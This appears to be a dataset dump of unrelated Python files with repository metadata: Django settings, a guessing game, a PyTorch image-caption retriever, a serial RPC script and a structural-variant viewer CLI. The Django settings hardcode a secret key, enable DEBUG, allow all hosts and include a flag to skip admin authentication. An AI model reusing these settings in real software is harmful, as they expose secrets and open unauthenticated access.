self.logger.info("REQUEST RESPONSE: channels.history" + str(r.json()))
return r.json()
| [
"p.delkowski@gmail.com"
] | p.delkowski@gmail.com |
a27f8a589fcb294a628b2ce89906de9bf3a88c12 | c2729192562355162c43c44266b0eef282cfcfa4 | /mysite/mysite/settings.py | 97f0872832ac8ba9e26d43925067db6c6db1afce | [] | no_license | lamngocchien/history | 1d678e0fe9a9e6441220c88c1bfc9e9f5457440c | 411e1bc18d644049cd0390b2b6ac52a1647b10a6 | refs/heads/master | 2020-04-14T04:57:20.481422 | 2019-01-01T17:48:51 | 2019-01-01T17:48:51 | 163,650,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,927 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.16.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# import utils
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'bfkeb55k$cau#+nwf_z4s7l1)r13rv=8rhb4uclxiznlvj=wt5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
DEBUG404 = False
if DEBUG:
DEBUG404 = False
else:
DEBUG404 = True
RUN_ON_WINDOWS_OS = True #For django running in Windows
WINDOWS_APPLICATION_UNAUTH = True # For Skip auth to login django/admin
ALLOWED_HOSTS = ["127.0.0.1", "*"]
# Application definition
INSTALLED_APPS = [
'suit',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'polls',
'polls.apps.PollsConfig',
]
# from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
# TEMPLATE_CONTEXT_PROCESSORS = TCP + (
# 'django.core.context_processors.request',
# )
# Django Suit configuration example
SUIT_CONFIG = {
'ADMIN_NAME': 'DATABASE',
'HEADER_DATE_FORMAT': 'l, j. F Y',
'HEADER_TIME_FORMAT': 'H:i',
'SHOW_REQUIRED_ASTERISK': True,
'CONFIRM_UNSAVED_CHANGES': True,
'MENU_EXCLUDE': ('auth.group',),
'MENU_OPEN_FIRST_CHILD': True,
'MENU': (
# Keep original label and models
{'label': 'CorePyTool', 'icon':'icon-cog', 'url': '/'},
# 'sites',
# Rename app and set icon
{'app': 'auth', 'label': 'Authorization', 'icon':'icon-lock'},
)
}
FILE_UPLOAD_HANDLERS = ['django.core.files.uploadhandler.TemporaryFileUploadHandler']
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# 'DIRS': ['C:/install/mysite/templates'],
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.core.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# 'NAME': 'C:/install/mysite/db.sqlite3',
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
# STATIC_URL = '/static/'
STATIC_PATH = os.path.join(BASE_DIR,'static')
STATIC_URL = '/static/' # You may find this is already defined as such.
STATICFILES_DIRS = (
STATIC_PATH,
)
# Logging Seting
import sys
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
# 'file': {
# 'level': 'ERROR',
# 'class': 'logging.FileHandler',
# 'filename': '/var/log/django_practices.log',
# 'formatter': 'verbose'
# },
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'stream': sys.stdout,
'formatter': 'verbose'
},
},
'loggers': {
# 'django': {
# 'handlers': ['console'],
# 'propagate': True,
# 'level': 'DEBUG',
# },
'polls': {
'handlers': ['console'],
'level': 'DEBUG',
},
'utils': {
'handlers': ['console'],
'level': 'DEBUG',
},
}
}
# DEBUG_TEMPLATE = False
# for i in range(0, len(TEMPLATES) - 1):
# TEMPLATES[i]['OPTIONS']['debug'] = DEBUG_TEMPLATE
| [
"lamngocchien@gmail.com"
] | lamngocchien@gmail.com |
2ae03a8811d0a424c3f3e1ee310d19da161a3b46 | cb60befefb7f6b9c8cfe3a75d1274190946fe20c | /1_Nguyen_Trong_Thiep/Ex 1/1.6.py | 4ad3ed570fad85595e4c08e8d0e6ce80e11b9a8d | [
"MIT"
] | permissive | thephong45/student-practices | 06da78c1cd677559cb1bb00ade1f849c3a2d4cf1 | 50704cedce5d893bfa47b4bf6d228f974d0d5768 | refs/heads/master | 2022-11-20T07:31:57.478309 | 2020-07-17T11:45:26 | 2020-07-17T11:45:26 | 279,014,002 | 0 | 0 | MIT | 2020-07-12T07:25:49 | 2020-07-12T07:25:48 | null | UTF-8 | Python | false | false | 915 | py | # Write a guessing game where the user has to guess a secret number. After every guess the program tells the user
# whether their number was too large or too small. At the end the number of tries needed should be printed. It counts
# only as one try if they input the same number multiple times consecutively
import random
rand = random.randint(1, 10)
history = []
while True:
n = input("Nhap vao so n trong khoang 1 den 10: ")
while not n.isdigit():
print("Your input is not a number, please try again")
n = input()
n = int(n)
if n < rand:
print("So ban nhap qua nho")
if n not in history:
history.append(n)
if n > rand:
print("So ban nhap qua lon")
if n not in history:
history.append(n)
if n == rand:
print("Ban da doan dung")
history.append(n)
break
print("Cac so ban da doan", history)
| [
"thienphong183@gmail.com"
] | thienphong183@gmail.com |
48da51e760e6da59f32febf9cde6a947531baee8 | aa4189aa0eef91371be009ee2c8bcb31aeabcde9 | /Lib/BoxEntity/BoxAddress.py | 467291260e323a98d5e783e22f9c00859ac513e4 | [] | no_license | break11/AutoStorage | fd2ac6a50e3223d2ec8d5d4ec0cb3f7d9c491630 | a336b7ea0fa7e41a8c7410a4ab6e37530477b618 | refs/heads/transporter_line | 2023-04-07T03:18:56.273261 | 2020-04-15T13:52:43 | 2020-04-15T13:52:43 | 264,171,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | from enum import auto
from Lib.Common.BaseEnum import BaseEnum
from Lib.Common.BaseTypes import CСompositeType
import Lib.GraphEntity.StorageGraphTypes as SGT
from Lib.Common.StrConsts import genSplitPattern
MDS = "="
MDS_split_pattern = genSplitPattern( MDS )
class EBoxAddressType( BaseEnum ):
OnNode = auto()
OnEdge = auto()
OnAgent = auto()
Undefined = auto()
Default = OnNode
################################
class CBoxAddress( CСompositeType ):
baseType = EBoxAddressType
dataFromStrFunc = {
EBoxAddressType.Undefined : lambda sData : sData,
EBoxAddressType.OnNode : SGT.SNodePlace.fromString,
EBoxAddressType.OnEdge : SGT.SEdgePlace.fromString,
EBoxAddressType.OnAgent : lambda sData : sData,
}
dataType_by_BaseType = {
EBoxAddressType.OnNode : SGT.SNodePlace,
EBoxAddressType.OnEdge : SGT.SEdgePlace,
EBoxAddressType.OnAgent : str
}
| [
"break1@yandex.ru"
] | break1@yandex.ru |
035293505b05a1c0ee88e5801f7e709f5f12634d | e03f502312775b01b41ea7c6f5cb3dfbafdb8509 | /orders/migrations/0007_auto_20180821_2324.py | 4e2f107876fafa52fbf630f534026efeac00a8f4 | [] | no_license | Grechanin/Misteckiy-DjangoRest-React-Redux | e223e89310362b8c21e30c8c669d4e170d232db6 | f05eb50a6aec72432716672294df81c3dc939ddd | refs/heads/master | 2020-04-13T10:58:17.931584 | 2019-02-18T09:21:54 | 2019-02-18T09:21:54 | 163,159,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-08-21 20:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orders', '0006_auto_20180816_2353'),
]
operations = [
migrations.AlterField(
model_name='order',
name='email',
field=models.EmailField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='order',
name='name',
field=models.CharField(default=None, max_length=128, verbose_name="І'мя"),
),
]
| [
"grechanin@gmail.com"
] | grechanin@gmail.com |
330c2266c59aa5b0280dcb87f1f900fadd9d71ee | 9ca90771f4c0002367909dfac6a8316afb77cbbb | /Python/Strings/MergeTheTools.py | e59a42fccab75893f65bd549751948ffdd3c61f1 | [] | no_license | jugal-chauhan/Hackerrank-Solutions | f4892562ba6ee2f9bdcc0ac219f5fb8f2befaad8 | 069bfe075f830fa5424cedf87a39571ea3233a08 | refs/heads/master | 2022-10-17T18:13:05.142405 | 2020-06-12T06:37:17 | 2020-06-12T06:37:17 | 262,621,630 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | # @author: Jugal Chauhan
def merge_the_tools(string, k):
# your code goes here
n = len(string)
for i in range(0, n, k):
dic = {}
res = ""
for c in string[i:i+k]:
if c not in dic:
dic[c] = 1
res += c
print(res)
if __name__ == '__main__':
string, k = input(), int(input())
merge_the_tools(string, k) | [
"jugaldc2000@gmail.com"
] | jugaldc2000@gmail.com |
8192c3927678dfacb700c871e74e68ba1dcf73e3 | ec54f4d79af7f1833246d2c65b82047a04777f61 | /9_2_Python_RPC/myled_write.py | fa0a5f163894dc5f951febfdf7c37a196f566808 | [] | no_license | 106061221/mbed09 | e5d1d9b1eaac4b8d9f4d0fc48e655bedc246e4f0 | 6c5d9e664e4b5145e6c56b96909bc912ba2fa004 | refs/heads/master | 2022-07-17T15:59:15.434661 | 2020-05-19T19:32:27 | 2020-05-19T19:32:27 | 265,251,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | import serial
import time
serdev = '/dev/ttyACM0' # use the device name you get from `ls /dev/ttyACM*`
s = serial.Serial(serdev)
s.write(bytes("/myled/write 1\r", 'UTF-8'))
line=s.readline() # Read an echo string from K66F terminated with '\n' (pc.putc())
print(line)
line=s.readline() # Read an echo string from K66F terminated with '\n' (RPC reply)
print(line)
time.sleep(1)
s.write(bytes("/myled/write 0\r", 'UTF-8'))
line=s.readline() # Read an echo string from K66F terminated with '\n' (pc.putc())
print(line)
line=s.readline() # Read an echo string from K66F terminated with '\n' (RPC reply)
print(line)
s.close()
| [
"rio714tw@gmail.com"
] | rio714tw@gmail.com |
91d6925dede4b4de9e1b6bcceaa9f0f14a515b34 | c5789b6576ac914ce7269834b6a288ad8fe418a0 | /TaskSets/filtering_task_set.py | d0f9252754e47559c8f3a74b9271c66804008764 | [
"Apache-2.0"
] | permissive | utkarsh7236/SCILLA | 3ebdd2cef7dc65061e4ae334a0c6b50efc052aa7 | e11e4d753823ad522a1b3168283b6e6ffe3ea393 | refs/heads/master | 2022-08-03T18:06:01.905309 | 2020-05-27T08:29:07 | 2020-05-27T08:29:07 | 264,383,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #!/usr/bin/env python
from TaskSets import TaskSet
#====================================================
class FilteringTaskSet(TaskSet):
def __init__(self, settings):
TaskSet.__init__(self, settings['name'])
self.settings = settings
self.settings['task_type'] = 'filtering'
self.task_type = 'filtering'
self.max_exec = 1 | [
"utkarsh7236@gmail.com"
] | utkarsh7236@gmail.com |
af88d0dccf501fa8929fa52b4934f51aba2e0097 | 2afa9eb1e2f974600c9fe1cc78dd20a6aed88369 | /cv/network.py | ba29bebc0115d1d3c780c942d7236be4ef5a362b | [] | no_license | Coldog2333/worker | 1ea4d960cae3ae5e8b27c403c215ef20e9be6af4 | 4e5815b970f2b2ff6a5bc2ee9a95f0e3118e79a3 | refs/heads/master | 2023-04-01T06:08:55.075097 | 2021-04-15T22:30:48 | 2021-04-15T22:30:48 | 358,408,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,137 | py | import torch
import torch.nn as nn
import torch.utils.data
from cv.data_provider import load_glove_embedding, Flickr_Dataset
from cv.config import *
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
class AlexNet(nn.Module):
def __init__(self, num_classes=1000, output_feat=False):
super(AlexNet, self).__init__()
self.output_feat = output_feat
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
nn.Conv2d(64, 192, kernel_size=5, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
)
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 6 * 6, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
def forward(self, x):
"""
Pass the input through the net.
Args:
x (Tensor): input tensor
Returns:
output (Tensor): output tensor
"""
x = self.features(x)
x = x.view(-1, 256 * 6 * 6) # reduce the dimensions for linear layer input
if self.output_feat:
return x
else:
return self.classifier(x)
class VGG(nn.Module):
def __init__(self, features, num_classes=1000, init_weights=True):
super(VGG, self).__init__()
self.features = features
self.classifier = nn.Sequential(
nn.Linear(512 * 7 * 7, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, num_classes),
)
if init_weights:
self._initialize_weights()
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(
m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg19_bn(pretrained=False, cv_weight_file=None, **kwargs):
"""VGG 19-layer model (configuration 'E') with batch normalization
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
if pretrained:
kwargs['init_weights'] = False
model = VGG(make_layers(cfg['E'], batch_norm=True), **kwargs)
if pretrained:
model.load_state_dict(torch.load(cv_weight_file))
return model
# def alexnet(pretrained=False, **kwargs):
# r"""AlexNet model architecture from the
# `"One weird trick..." <https://arxiv.org/abs/1404.5997>`_ paper.
# Args:
# pretrained (bool): If True, returns a model pre-trained on ImageNet
# """
# model = AlexNet(**kwargs)
# if pretrained:
# # model.load_state_dict(model_zoo.load_url(model_urls['alexnet']))
# model.load_state_dict(torch.load(CV_FILE))
# return model
class Text_Representer(nn.Module):
def __init__(self, embedding_matrix):
super(Text_Representer, self).__init__()
self.embedding_matrix = embedding_matrix
self.vocab_num, self.embed_dim = self.embedding_matrix.shape
self.embedding = nn.Embedding(self.vocab_num, self.embed_dim)
self.embedding.weight = embedding_matrix
self.gru = nn.GRU(input_size=self.embed_dim, hidden_size=256 * 6, batch_first=True)
self.linear = nn.Linear(in_features=256 * 6, out_features=256 * 6 * 6)
def forward(self, sentence, length):
x = self.embedding(sentence)
# x = torch.sum(x, dim=1)
# x = torch.nn.utils.rnn.pad_sequence(x, batch_first=True)
x = torch.nn.utils.rnn.pack_padded_sequence(x, length, batch_first=True, enforce_sorted=False)
_, x = self.gru(x)
x = self.linear(x[0])
return x
class Cross_Modal_Retriever(nn.Module):
def __init__(self, embedding_matrix, cv_weight_file=None):
super(Cross_Modal_Retriever, self).__init__()
self.cv_net = AlexNet(output_feat=True)
if cv_weight_file:
self.cv_net.load_state_dict(torch.load(cv_weight_file))
self.nlp_net = Text_Representer(embedding_matrix=embedding_matrix)
def forward(self, image, pos_caption, pos_length, neg_captions, neg_lengths):
cv_feats = self.cv_net(image)
nlp_pos_feats = self.nlp_net(pos_caption, pos_length.view(-1))
neg_pos_feats = self.nlp_net(neg_captions.view(-1, neg_captions.shape[2]), neg_lengths.view(-1))
neg_pos_feats = neg_pos_feats.view(neg_captions.shape[0], neg_captions.shape[1], -1)
# similarity = torch.diagonal(torch.matmul(nlp_feats, cv_feats.T))
return cv_feats, nlp_pos_feats, neg_pos_feats
class TripletLoss(nn.Module):
'''
Compute normal triplet loss or soft margin triplet loss given triplets
'''
def __init__(self, margin=None):
super(TripletLoss, self).__init__()
self.margin = margin
if self.margin is None: # if no margin assigned, use soft-margin
self.Loss = nn.SoftMarginLoss()
else:
self.Loss = nn.TripletMarginLoss(margin=margin, p=2)
def forward(self, anchor, pos, neg):
if self.margin is None:
num_samples = anchor.shape[0]
y = torch.ones((num_samples, 1)).view(-1)
if anchor.is_cuda: y = y.cuda()
ap_dist = torch.norm(anchor-pos, 2, dim=1).view(-1)
an_dist = torch.norm(anchor-neg, 2, dim=1).view(-1)
loss = self.Loss(an_dist - ap_dist, y)
else:
loss = self.Loss(anchor, pos, neg)
return loss
if __name__ == "__main__":
flickr_root_dir = '/Users/jiangjunfeng/Desktop/coldog/worker/dataset/flickr_30k/flickr100'
flickr_caption_filename = flickr_root_dir + '/results.token'
flickr_image_dir = flickr_root_dir + '/flickr100-images'
##### debug 词向量部分
embedding_matrix, word2id_dict, _ = load_glove_embedding(GLOVE_FILE)
# print(embedding_matrix.shape)
##### debug部分
retriever = Cross_Modal_Retriever(embedding_matrix=nn.Parameter(torch.tensor(embedding_matrix, dtype=torch.float),
requires_grad=True),
cv_weight_file=CV_FILE)
dataset = Flickr_Dataset(flickr_caption_filename, flickr_image_dir, word2id_dict=word2id_dict)
dataloader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=2,
shuffle=True,
num_workers=2)
for step, (caption, image) in enumerate(dataloader):
sim = retriever(caption, image)
print(sim)
| [
"ubuntu@localhost.localdomain"
] | ubuntu@localhost.localdomain |
b934abe1ec9e66707f33db0e578efa609569191a | a80e25fda0f0ff496136af48e858b897e6b22b7a | /SVPV | 13708965340b19ca0b351ba26ca755aa65d46abd | [
"MIT"
] | permissive | Linhua-Sun/SVPV | 98a7f16f0fcdd6670bf9a41d2331fdf673dd5ec9 | d1c14842dc9dbcf43eb233fc9d55dcee3b30d228 | refs/heads/master | 2021-01-21T10:13:25.734026 | 2017-02-20T02:26:04 | 2017-02-20T02:26:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,204 | #!/usr/bin/env python
# # -*- coding: utf-8 -*-
# """
# author: Jacob Munro, Victor Chang Cardiac Research Institute
# """
from __future__ import print_function
import sys
import os
import re
from os.path import expanduser as expu
from svpv.vcf import VCFManager, BCFtools
from svpv.sam import SAMtools
from svpv.refgene import RefgeneManager
from svpv.plot import Plot
version = "1.00"
info = ("\t============================================\n"
"\t|| Structural Variant Prediction Viewer ||\n"
"\t|| Version {} ||\n"
"\t============================================\n".format(version))
def main(argv=sys.argv):
try:
assert (sys.version_info[0] == 2 and sys.version_info[1] >= 7) or (sys.version_info[0] > 2)
except AssertionError:
print("Error: python 2.7+ required. Please update your python installation.")
exit(1)
BCFtools.check_installation()
SAMtools.check_installation()
if '-example' in argv:
example(argv)
else:
par = Params(argv)
if not par.run.all:
par.run.vcf.remove_absent_svs(par.run.samples)
if par.run.gui:
import svpv.gui as GUI
par.filter.gene_list_intersection = False
GUI.main(par)
else:
svs = par.run.vcf.filter_svs(par.filter)
for sv in svs:
plot = Plot(sv, par.run.samples, par)
plot.plot_figure(group=par.plot.grouping)
usage = 'Usage example:\n' \
'SVPV -vcf input_svs.vcf -samples sample1,sample2 -aln alignment1.bam,alignment2.sam\n -o /out/directory/\n'\
'\nRun args:\n' \
'[required]\n' \
'-vcf\t\tPrimary structural variant prediction vcf/bcf file.\n' \
'-aln\t\tComma separated list of alignment files (BAM/CRAM).\n' \
'-samples\tComma separated list of samples to view,' \
'\n\t\t\tnames must be the same as in vcf.\n' \
'-o\t\tOutput directory.\n' \
'[optional]\n' \
'-gui\t\tRun in gui mode.\n' \
'-ref_vcf\tReference structural variant vcf/bcf file for annotation.\n' \
'-ref_gene\tRefseq genes file for annotation.\n' \
'-manifest\tWhitespace delimited file with first column sample names and' \
'\n\t\tsecond column alignment files.' \
'\n\t\toverrides \'-samples\' and \'-aln\' if also given.\n' \
'-fa\t\tReference genome Fasta file to add GC content annotation.\n' \
'-separate_plots\tIndividual plots produced for each sample.\n' \
'-l_svs\t\tshow SVs extending beyond the current plot area.\n' \
'-disp\t\tPDF viewer command. GUI mode only.\n' \
'\t\t\tdefault: "display"\n' \
'-rd_len\t\tsequencing read length, optimises window size.\n' \
'\t\t\tdefault: 100\n' \
'-exp\t\twindow expansion, proportion of SV len added to each side.\n' \
'\t\t\tdefault: 1\n' \
'-bkpt_win\tbreakpoint window, number of read lengths to set windows around\n' \
'\t\tbreakpoints.\n' \
'\t\t\tdefault: 5\n' \
'-n_bins\t\ttarget number of bins for plot window.\n' \
'\t\t\tdefault: 100\n' \
'\nFilter args:\n' \
'-max_len\tmaximum length of structural variants (bp).\n' \
'-min_len\tminimum length of structural variants (bp).\n' \
'-af\t\tAllele frequency threshold: \n' \
'\t\t\teg \'-af <0.1\' for SV with frequency less than 0.1.\n' \
'-gts\t\tSpecify genotypes of given samples:' \
'\n\t\t\teg \'-gts sample1:0/1,1/1;sample3:1/1\'.\n' \
'-chrom\t\tRestrict to comma separated list of chromosomes.\n' \
'-svtype\t\tRestrict to given SV type (DEL/DUP/CNV/INV).\n' \
'-rgi\t\tRestrict to SVs that intersect refGenes, \'-ref_gene\' must be\n' \
'\t\tsupplied.\n' \
'-exonic\t\tRestrict to SVs that intersect exons of refGenes,' \
'\n\t\t\'-ref_gene\' must be supplied.\n' \
'\nPlot args:\n' \
'-d\t0/[1]\tforce sequencing depth plot on or off.\n' \
'-or\t0/[1]\tforce orphaned reads plot on or off.\n' \
'-v\t0/[1]\tforce inverted pairs plot on or off.\n' \
'-ss\t0/[1]\tforce same strand pairs plot on or off.\n' \
'-cl\t0/[1]\tforce clipped reads plot on or off.\n' \
'-se\t[0]/1\tforce SAM \'secondary alignment\' plot on or off.\n' \
'-su\t[0]/1\tforce SAM \'supplementary alignment\' plot on or off.\n' \
'-dm\t[0]/1\tforce mate different molecule alignment plot on or off.\n' \
'-i\t0/[1]\tforce inferred insert size plot on or off.\n' \
'-r\t0/[1]\tforce refgenes plot on or off.\n' \
'-af\t0/[1]\tforce allele frequency plot on or off.\n' \
'-l\t0/[1]\tforce plot legend on or off.\n'
def check_file_exists(path):
if not os.path.isfile(path):
print("Error: file does not exist!\n'%s'\n" % path)
exit(1)
class Params:
def __init__(self, args):
self.run = RunParams()
self.filter = FilterParams(self)
self.plot = PlotParams()
self.ver = version
for i, a in enumerate(args):
if a[0] == '-':
# set run parameters
if a in RunParams.valid:
if a == '-vcf':
self.run.set_vcfs(args[i + 1])
elif a == '-aln':
self.run.bams = args[i + 1].split(',')
elif a == '-all':
self.run.all = True
elif a == '-samples':
self.run.samples = args[i + 1].split(',')
elif a == '-manifest':
if self.run.samples or self.run.bams:
print("samples and alignments provided as command line arguments overriden by manifest file\n")
self.run.read_samples_file(expu(args[i + 1]))
elif a == '-o':
self.run.out_dir = expu(args[i + 1])
elif a == '-gui':
self.run.gui = True
elif a == '-disp':
self.run.display = args[i + 1]
elif a == '-rd_len':
self.run.rd_len = int(args[i + 1])
elif a == '-exp':
self.run.expansion = float(args[i + 1])
elif a == '-bkpt_win':
self.run.bkpt_win = float(args[i + 1])
elif a == '-n_bins':
self.run.num_bins = int(args[i + 1])
elif a == '-fa':
check_file_exists(expu(args[i + 1]))
self.run.fa = expu(args[i + 1])
elif a == '-ref_gene':
self.run.ref_genes = RefgeneManager(args[i + 1])
self.filter.ref_genes = self.run.ref_genes
elif a == '-ref_vcf':
if ':' in args[i + 1]:
check_file_exists(expu(args[i + 1].split(':')[1]))
self.run.ref_vcf = VCFManager(expu(args[i + 1].split(':')[1]), name=args[i + 1].split(':')[0], db_mode=True)
else:
check_file_exists(args[i + 1])
self.run.ref_vcf = VCFManager(args[i + 1], name='reference', db_mode=True)
# set filter parameters
elif a in FilterParams.valid:
# set max and min length filters
if a == '-max_len':
try:
self.filter.max_len = int(args[i + 1])
except ValueError:
print("invalid max length:" + args[i + 1])
exit(1)
elif a == '-min_len':
try:
self.filter.min_len = int(args[i + 1])
except ValueError:
print("invalid min length:" + args[i + 1])
exit(1)
# set allele frequency for filtering
elif a == '-af':
if '>' in args[i + 1]:
self.filter.AF_thresh_is_LT = False
try:
self.filter.AF_thresh = float(re.sub('[<>]', '', args[i + 1]))
except ValueError:
print(usage)
print("invalid allele frequency threshold: -af " + args[i+1])
exit(1)
# switch for refgene intersections
elif a == '-svtype':
if args[i+1].upper() in ('DEL', 'DUP', 'INV', 'CNV'):
self.filter.svtype = args[i+1].upper()
else:
print('invalid svtype %s' % args[i+1])
exit(1)
elif a == '-rgi':
self.filter.RG_intersection = True
elif a == '-exonic':
self.filter.exonic = True
# list of genes reported SVs must intersect
elif a == '-gene_list':
# read in newline/whitespace delimited list of genes
self.filter.gene_list = []
for line in open(args[i + 1]):
for word in line.split():
self.filter.gene_list.append(word.strip().upper())
self.filter.gene_list_intersection = True
elif a == '-gts':
# specify genotypes of given samples in form: sample1:0/1,1/1;sample3:1/1
self.filter.sampleGTs = {}
for sample in args[i + 1].split(';'):
self.filter.sample_GTs[sample.split(':')[0]] = sample.split(':')[1].split(',')
elif a == '-chrom':
self.filter.chrom = args[i + 1]
elif a in PlotParams.valid:
if a == '-d':
if (args[i + 1]) == '0':
self.plot.depth = False
elif (args[i + 1]) == '1':
self.plot.depth = True
elif a == '-or':
if (args[i + 1]) == '0':
self.plot.orphaned = False
elif (args[i + 1]) == '1':
self.plot.orphaned = True
elif a == '-v':
if (args[i + 1]) == '0':
self.plot.inverted = False
elif (args[i + 1]) == '1':
self.plot.inverted = True
elif a == '-ss':
if (args[i + 1]) == '0':
self.plot.samestrand = False
elif (args[i + 1]) == '1':
self.plot.samestrand = True
elif a == '-se':
if (args[i + 1]) == '0':
self.plot.secondary = False
elif (args[i + 1]) == '1':
self.plot.secondary = True
elif a == '-su':
if (args[i + 1]) == '0':
self.plot.supplementary = False
if (args[i + 1]) == '1':
self.plot.supplementary = True
elif a == '-dm':
if (args[i + 1]) == '0':
self.plot.diff_mol = False
if (args[i + 1]) == '1':
self.plot.diff_mol = True
elif a == '-cl':
if (args[i + 1]) == '0':
self.plot.clipped = False
elif (args[i + 1]) == '1':
self.plot.clipped = True
elif a == '-i':
if (args[i + 1]) == '0':
self.plot.ins = False
elif (args[i + 1]) == '1':
self.plot.ins = True
elif a == '-r':
if (args[i + 1]) == '0':
self.plot.refgene = False
elif (args[i + 1]) == '1':
self.plot.refgene = True
elif a == '-af':
if (args[i + 1]) == '0':
self.plot.sv_af = False
elif (args[i + 1]) == '1':
self.plot.sv_af = True
elif a == '-l':
if (args[i + 1]) == '0':
self.plot.legend = False
elif (args[i + 1]) == '1':
self.plot.legend = True
elif a == '-separate_plots':
self.plot.grouping = 1
elif a == 'l_svs':
self.plot.l_svs = True
else:
print("unrecognised argument: " + a)
exit(1)
self.run.check()
# class to store run parameters
class RunParams:
valid = ('-vcf','-aln', '-samples', '-manifest', '-o', '-gui', '-ref_gene', '-ref_vcf', '-fa', '-rd_len',
'-exp', '-bkpt_win', '-n_bins', '-disp')
def __init__(self):
# path to vcf
self.vcf = None
# set of alternate sv callsets to visualise against
self.alt_vcfs = []
# list of bams
self.bams = []
# list of samples
self.samples = []
# directory to write data to
